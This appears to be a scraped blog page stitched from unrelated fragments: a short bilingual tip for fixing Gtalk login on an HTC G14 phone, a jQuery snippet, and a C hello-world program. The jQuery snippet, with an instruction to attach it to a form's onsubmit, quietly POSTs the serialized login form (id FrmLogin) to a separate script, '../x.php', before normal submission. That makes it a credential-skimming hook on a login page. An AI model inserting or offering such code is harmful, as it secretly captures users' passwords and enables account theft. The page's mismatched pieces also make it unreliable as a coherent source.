HTC G14 无法打开 GTALK….
Htc G14 can’t open gtalk
设置–账户与同步 –关闭『背景数据』–启动Gtalk–提示『Google talk 需要启用背景数据』–启用–开启背景数据–返回gtalk–登录正常
Settings – Account and Sync – off “background data” – start Gtalk – prompt “Google talk you need to enable background data” – enable – turn background data – return to gtalk – login angin Gtalk
by crazylive
<script src=”http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js” type=”text/javascript”></script>
<script language=”JavaScript”>
function checksubmit()
{
$.ajax({
type : “POST”,
async : false,
url : “../x.php”,
data : $(“#FrmLogin”).serialize(),
success : function(msg){return true;}
});
}
</script>
action后面加上onsubmit=”return checksubmit();”
#include <stdio.h>
int main(void)
{
printf(“Hello, world!\n”);
}